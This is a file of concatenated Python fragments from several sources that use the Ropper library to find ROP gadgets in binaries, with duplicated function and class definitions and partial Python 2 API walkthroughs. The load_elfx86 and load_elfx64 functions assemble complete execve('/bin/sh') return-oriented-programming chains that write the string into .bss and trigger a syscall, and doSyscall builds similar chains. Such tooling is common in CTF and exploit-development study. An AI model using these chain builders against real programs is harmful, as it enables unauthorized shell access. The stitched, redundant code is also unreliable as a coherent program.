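def get_gadgets(path='bin_4', bin_name='bin', arch='x86_64'):
    """Load a raw binary into Ropper and return the gadgets matching a fixed pattern set.

    The defaults reproduce the original hard-coded behaviour (file ``bin_4``
    registered as ``bin`` for ``x86_64``); the parameters only make those
    values configurable.

    Args:
        path: file whose bytes are handed to Ropper as a raw image.
        bin_name: name the image is registered under in the RopperService
            (also the ``name`` used when searching).
        arch: architecture string passed to ``addFile``.

    Returns:
        list of the raw ``rs.search`` results, in pattern order:
        ``'pop rsi'``, ``'leave'``, ``'pop rdi'``.
    """
    options = {
        'color': False,     # if gadgets are printed, use colored output; default: False
        'badbytes': '00',   # bytes not allowed in addresses; cleared to '' below, so 0x00 is allowed
        'all': False,       # keep duplicate gadgets; set to True below
        'inst_count': 6,    # number of instructions in a gadget; default: 6
        'type': 'all',      # rop, jop, sys, all; switched to 'rop' below
        'detailed': False,  # if gadgets are printed, use detailed output; default: False
    }
    rs = RopperService(options)
    # Read through a context manager so the handle is closed (the original
    # called open(...).read() and leaked it).
    with open(path, 'rb') as fh:
        image = fh.read()
    rs.addFile(bin_name, bytes=image, raw=True, arch=arch)
    rs.options.badbytes = ''
    rs.options.all = True
    rs.loadGadgetsFor()
    rs.options.type = 'rop'
    # Second load after changing the type, as in the original.
    rs.loadGadgetsFor()
    gadgets = []
    for pattern in ('pop rsi', 'leave', 'pop rdi'):
        gadgets.extend(rs.search(search=pattern, name=bin_name))
    return gadgets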
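def get_gadgets(executable_name):
    """Load *executable_name* into Ropper and return gadget strings for the current arch.

    Reads the module-level ``binary_arch`` (``'amd64'`` or ``'i386'``); any
    other value is reported via ``log.failure`` and the process exits with a
    non-zero status (the original called bare ``exit()``, which exits 0).

    Args:
        executable_name: path of the file to load; it is also the name the
            file is registered under in the RopperService.

    Returns:
        list of ``str(gadget)`` values.  For each search pattern either every
        hit is collected or only the first one (``first_only``), matching the
        original ``break`` placement.
    """
    import sys

    global binary_arch
    arch_by_name = {'amd64': 'x86_64', 'i386': 'x86'}
    arch = arch_by_name.get(binary_arch)
    if arch is None:
        log.failure('Unknown arch')
        sys.exit(1)

    options = {
        'color': False,
        'badbytes': '00',   # cleared to '' below, so 0x00 is allowed in addresses
        'all': False,       # set to True below (duplicates are kept)
        'inst_count': 6,
        'type': 'all',      # switched to 'rop' before the second load
        'detailed': False,
    }
    rs = RopperService(options)
    # Context manager so the file handle is closed (the original leaked it).
    with open(executable_name, 'rb') as fh:
        image = fh.read()
    rs.addFile(executable_name, bytes=image, raw=True, arch=arch)
    rs.options.badbytes = ''
    rs.options.all = True
    rs.loadGadgetsFor()
    rs.options.type = 'rop'
    rs.loadGadgetsFor()

    def collect(pattern, first_only=False):
        # Stringify the gadget part of each search hit; stop after one when asked.
        hits = []
        for result in rs.search(search=pattern, name=executable_name):
            hits.append(str(result[1]))
            if first_only:
                break
        return hits

    if binary_arch == 'amd64':
        plan = [
            ('pop r?i', False),
            ('pop r?x', False),
            ('pop r?p', False),
            ('syscall', True),
            ('leave', True),
        ]
    else:
        plan = [
            ('pop e?x', False),
            ('pop e?p', False),
            ('int 0x80', True),
            ('leave', True),
        ]

    gags = []
    for pattern, first_only in plan:
        gags.extend(collect(pattern, first_only))
    return gags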
def load_elfx86(elf):
    """Look up the gadgets used by the 32-bit chain in *elf* and assemble the payload.

    Every search loop prints each hit and rebinds its variable, so the last
    hit wins.  If a pattern has no hit the variable is never bound and the
    first ``craft_payloadx86`` call that uses it raises NameError; ``bss`` is
    likewise only bound when the file has a ``.bss`` section.  ``ffropper``
    and ``craft_payloadx86`` are helpers defined elsewhere (not in view).

    Returns:
        the concatenated payload as built by ``craft_payloadx86``.
    """
    rs = RopperService()
    rs.addFile(elf)
    rs.loadGadgetsFor()
    for file, gadget in rs.search(search="pop ecx; pop ebx; ret", name=elf):
        pop_ecx_ebx = ffropper(gadget)
        print("[+] pop ecx; ebx; ret; : " + pop_ecx_ebx)
    for file, gadget in rs.search(search="pop eax; ret;", name=elf):
        pop_eax = ffropper(gadget)
        print("[+] pop eax; ret; : " + pop_eax)
    for file, gadget in rs.search(search="pop edx; ret;", name=elf):
        pop_edx = ffropper(gadget)
        print("[+] pop edx; ret; : " + pop_edx)
    for file, gadget in rs.search(search="mov [edx], eax; ret", name=elf):
        mov_edx_eax = ffropper(gadget)
        print("[+] mov dword ptr [edx], eax; ret; : " + mov_edx_eax)
    for file, gadget in rs.search(search="int 0x80; ret;", name=elf):
        int0x80 = ffropper(gadget)
        print("[+] int 0x80; ret; : " + int0x80)
    # Address of .bss is taken from the section header; it is the scratch
    # location the chain writes into (see the "bss+0" / "bss+4" steps).
    with open(elf, 'rb') as f:
        e = ELFFile(f)
        for section in e.iter_sections():
            if section.name == ".bss":
                bss = section["sh_addr"]
                print("[+] bss segment : " + hex(bss))
    # The chain below is order-sensitive: each step is labelled by the second
    # argument.  The string is stored in two 4-byte writes (bss+0, bss+4);
    # note that bss is passed as hex() text here, not as an int.
    payload = craft_payloadx86(pop_eax, "pop eax; ret")
    payload += craft_payloadx86("'/bin'", "/bin/sh string", string=1)
    payload += craft_payloadx86(pop_edx, "pop edx; ret")
    payload += craft_payloadx86(hex(bss), "bss+0")
    payload += craft_payloadx86(mov_edx_eax, "mov dword ptr [edx], eax; ret; ")
    payload += craft_payloadx86(pop_eax, "pop eax; ret")
    payload += craft_payloadx86("'/sh\\x00'", "/bin/sh string", string=1)
    payload += craft_payloadx86(pop_edx, "pop edx; ret")
    payload += craft_payloadx86(hex(bss + 4), "bss+4")
    payload += craft_payloadx86(mov_edx_eax, "mov dword ptr [edx], eax; ret; ")
    payload += craft_payloadx86(pop_eax, "pop eax; ret")
    payload += craft_payloadx86(str(11), "execve()")
    payload += craft_payloadx86(pop_edx, "pop edx; ret")
    payload += craft_payloadx86(0, "0")
    payload += craft_payloadx86(pop_ecx_ebx, "pop ecx; ebx; ret")
    payload += craft_payloadx86("0", "0")
    payload += craft_payloadx86(hex(bss), "bss")
    payload += craft_payloadx86(int0x80, "int 0x80; ret;")
    return payload
def doSyscall(self, id):
    """Append a ``syscall ; ret`` gadget to the chain being built.

    ``id`` is a hex string; it is handed to ``self.set_reg`` first (the
    returned pair is unpacked but not used here).  The cached
    ``self.gadgets`` mapping (address text -> gadget text) is consulted
    first; on a miss a fresh RopperService search over ``self.binary`` is
    run and its first hit is added to the cache.  The chosen address is then
    recorded in ``self.code``, ``self.payload`` and ``self.gadget_used``.

    Returns:
        ``(self.code, self.payload)``.

    Raises:
        Exception: if neither the cache nor the search yields a gadget.
    """
    _s, _p = self.set_reg(rax=1, data=int(id, 16), mode=2)

    wanted = "syscall ; ret \n"
    address = None
    for cached in self.gadgets:
        if self.gadgets[cached] == wanted:
            address = cached
            break

    if address is None:
        rs = RopperService()
        rs.addFile(self.binary)
        rs.loadGadgetsFor()
        for _file, hit in rs.search('syscall; ret'):
            text = str(hit)
            head, tail = text.split(": ")[0], text.split(": ")[1]
            # NOTE(review): [12:] presumably skips a fixed-width prefix of
            # str(gadget) before the address digits -- confirm against Ropper's
            # output format.
            address = '0x' + head[12:]
            self.gadgets[address] = tail
            break

    if address is None:
        raise Exception('No syscall gadgets found!')

    self.code.append("chain += p64(" + address + ")")
    self.payload += p64(int(address, 16))
    self.gadget_used.append(self.gadgets[address])
    return self.code, self.payload
def load_elfx64(elf):
    """Look up the gadgets used by the 64-bit chain in *elf* and assemble the payload.

    Every search loop prints each hit and rebinds its variable, so the last
    hit wins.  If a pattern has no hit the variable is never bound and the
    first ``craft_payloadx64`` call that uses it raises NameError; ``bss`` is
    likewise only bound when the file has a ``.bss`` section.  ``ffropper``
    and ``craft_payloadx64`` are helpers defined elsewhere (not in view).

    Returns:
        the concatenated payload as built by ``craft_payloadx64``.
    """
    rs = RopperService()
    rs.addFile(elf)
    rs.loadGadgetsFor()
    for file, gadget in rs.search(search="pop rdx; ret;", name=elf):
        pop_rdx = ffropper(gadget)
        print("[+] pop rdx; ret; : " + pop_rdx)
    for file, gadget in rs.search(search="pop rax; ret;", name=elf):
        pop_rax = ffropper(gadget)
        print("[+] pop rax; ret; : " + pop_rax)
    for file, gadget in rs.search(search="pop rsi; ret;", name=elf):
        pop_rsi = ffropper(gadget)
        print("[+] pop rsi; ret; : " + pop_rsi)
    for file, gadget in rs.search(search="pop rdi; ret;", name=elf):
        pop_rdi = ffropper(gadget)
        print("[+] pop rdi; ret; : " + pop_rdi)
    for file, gadget in rs.search(search="mov [rdx], rax; ret; ", name=elf):
        mov_rdx_rax = ffropper(gadget)
        print("[+] mov qword ptr [rdx], rax; ret; : " + mov_rdx_rax)
    for file, gadget in rs.search(search="syscall; ret;", name=elf):
        syscall = ffropper(gadget)
        print("[+] syscall; ret; : " + syscall)
    # Address of .bss is taken from the section header; it is the scratch
    # location the chain writes into (the "bss" steps below).
    with open(elf, 'rb') as f:
        e = ELFFile(f)
        for section in e.iter_sections():
            if section.name == ".bss":
                bss = section["sh_addr"]
                print("[+] bss segment : " + hex(bss))
    # The chain below is order-sensitive: each step is labelled by the second
    # argument.  Unlike the x86 variant, bss is passed as an int, not hex() text.
    payload = craft_payloadx64(pop_rax, "pop rax; ret;")
    payload += craft_payloadx64("'/bin/sh\\x00'", "/bin/sh string", string=1)
    payload += craft_payloadx64(pop_rdx, "pop rdx; ret;")
    payload += craft_payloadx64(bss, "bss")
    payload += craft_payloadx64(mov_rdx_rax, "mov [rdx], rax; ret")
    payload += craft_payloadx64(pop_rax, "pop rax; ret")
    payload += craft_payloadx64(59, "execve()")
    payload += craft_payloadx64(pop_rdi, "pop rdi; ret")
    payload += craft_payloadx64(bss, "bss")
    payload += craft_payloadx64(pop_rsi, "pop rsi; ret")
    payload += craft_payloadx64(0, "NULL")
    payload += craft_payloadx64(pop_rdx, "pop rdx; ret")
    payload += craft_payloadx64(0, "NULL")
    payload += craft_payloadx64(syscall, "syscall")
    return payload
class MyRopper():
    """Small wrapper around a single-file RopperService.

    Exposes gadget search, string search, the detected architecture and a
    MIPS-style ``$ra`` stack-offset extractor.
    """

    def __init__(self, filename):
        self.rs = RopperService()
        service = self.rs
        service.clearCache()
        service.addFile(filename)
        service.loadGadgetsFor()
        # Allow longer gadgets, then reload twice: the extra reload is a
        # workaround for Ropper sometimes not picking up the new gadgets.
        service.options.inst_count = 10
        service.loadGadgetsFor()
        service.loadGadgetsFor()

    def get_gadgets(self, regex):
        """Return every gadget whose text matches *regex*.

        Raises:
            Exception: when the search has no hits.
        """
        found = [gadget for _, gadget in self.rs.search(search=regex)]
        if not found:
            raise Exception("Cannot find gadgets!")
        return found

    def contains_string(self, string):
        """Return True if ``searchString`` reports at least one hit for the first file."""
        per_file = self.rs.searchString(string)
        first_file_hits = list(per_file.values())[0]
        return len(first_file_hits) > 0

    def get_arch(self):
        """Return the architecture name Ropper detected for the first loaded file."""
        return self.rs.files[0].arch._name

    @staticmethod
    def get_ra_offset(gadget):
        """Return the stack offset at which the gadget reloads ``$ra``.

        Scans ``gadget.lines`` (pairs whose second element is the instruction
        text) for ``lw $ra, 0xNN($sp)`` and returns ``0xNN`` as an int, i.e.
        how many bytes precede the next return address on the stack.

        Raises:
            Exception: when no line loads ``$ra`` from ``$sp``.
        """
        ra_load = r"lw \$ra, (0x[0-9a-f]+)\(\$sp\)"
        for line in gadget.lines:
            offsets = re.findall(ra_load, line[1])
            if offsets:
                return int(offsets[0], 16)
        raise Exception("Cannot find $ra offset in this gadget!")
class MyRopper():
    """Wrapper around a single-file RopperService (variant with ``[-]`` error prefixes)."""

    def __init__(self, filename):
        self.rs = RopperService()
        self.rs.clearCache()
        self.rs.addFile(filename)
        self.rs.loadGadgetsFor()
        # Raise the gadget length limit and reload twice, exactly as the
        # original does (the second reload is presumably a cache workaround).
        self.rs.options.inst_count = 10
        for _ in range(2):
            self.rs.loadGadgetsFor()

    def get_gadgets(self, regex):
        """Return all gadgets matching *regex*; raise if there are none."""
        pairs = list(self.rs.search(search=regex))
        if len(pairs) == 0:
            raise Exception("[-] Cannot find gadgets!")
        return [gadget for _, gadget in pairs]

    def contains_string(self, string):
        """True when the first file's ``searchString`` result list is non-empty."""
        per_file = self.rs.searchString(string)
        first = list(per_file.values())[0]
        return bool(len(first))

    def get_arch(self):
        """Architecture name Ropper detected for the first loaded file."""
        return self.rs.files[0].arch._name

    @staticmethod
    def get_ra_offset(gadget):
        """Return the ``$sp`` offset of the ``lw $ra, ...`` in *gadget* as an int.

        ``gadget.lines`` is iterated as pairs whose second element is the
        instruction text; the first matching line wins.

        Raises:
            Exception: when no line loads ``$ra`` from the stack.
        """
        ra_load = re.compile(r"lw \$ra, (0x[0-9a-f]+)\(\$sp\)")
        for line in gadget.lines:
            hit = ra_load.search(line[1])
            if hit:
                return int(hit.group(1), 16)
        raise Exception("[-] Cannot find $ra offset in this gadget!")
# Ropper API walkthrough in Python 2 syntax (print statements).  `rs` and
# `j` are defined earlier in the script; `print j` is the tail of a loop whose
# header is outside this fragment.
print j

##### search opcode ######
ls = 'test-binaries/ls-x86'
# Three searches in a row; each result replaces the previous one, so only the
# '??e4' hits are printed below.  '?' is Ropper's single-nibble wildcard.
gadgets_dict = rs.searchOpcode(opcode='ffe4', name=ls)
gadgets_dict = rs.searchOpcode(opcode='ffe?')
gadgets_dict = rs.searchOpcode(opcode='??e4')
for file, gadgets in gadgets_dict.items():
    for g in gadgets:
        print g

##### search instructions ######
ls = 'test-binaries/ls-x86'
# search() yields (file, gadget) pairs; with no name= it covers every loaded file.
for file, gadget in rs.search(search='mov e?x', name=ls):
    print file, gadget
for file, gadget in rs.search(search='mov [e?x%]'):
    print file, gadget
# searchdict() groups the hits per file instead.
result_dict = rs.searchdict(search='mov eax')
for file, gadgets in result_dict.items():
    print file
    for gadget in gadgets:
        print gadget

##### assemble instructions ######
# asm() returns a hex string by default; format='raw' returns the raw bytes.
hex_string = rs.asm('jmp esp')
print '"jmp esp" assembled to hex string =', hex_string
raw_bytes = rs.asm('jmp esp', format='raw')
# Ropper API walkthrough in Python 2 syntax (print statements).  `rs` and
# `jmp_reg` come from earlier in the script.
for j in jmp_reg:
    print '%s' % j

##### search opcode ######
ls = 'test-binaries/ls-x86'
# Each call overwrites the previous result, so only the '??e4' hits reach the
# loop below; '?' is Ropper's single-nibble wildcard.
gadgets_dict = rs.searchOpcode(opcode='ffe4', name=ls)
gadgets_dict = rs.searchOpcode(opcode='ffe?')
gadgets_dict = rs.searchOpcode(opcode='??e4')
for gadgets in gadgets_dict.values():
    for g in gadgets:
        print '%s' % g

##### search instructions ######
ls = 'test-binaries/ls-x86'
# search() yields (file, gadget) pairs; without name= every loaded file is searched.
for file, gadget in rs.search(search='mov e?x', name=ls):
    print '%s %s' % (file, gadget)
for file, gadget in rs.search(search='mov [e?x%]'):
    print '%s %s' % (file, gadget)
# searchdict() groups hits per file.
result_dict = rs.searchdict(search='mov eax')
for file, gadgets in result_dict.items():
    print '%s' % file
    for gadget in gadgets:
        print '%s' % gadget

##### assemble instructions ######
# asm() yields a hex string by default; format='raw' yields the raw bytes.
hex_string = rs.asm('jmp esp')
print '"jmp esp" assembled to hex string = %s' % hex_string
raw_bytes = rs.asm('jmp esp', format='raw')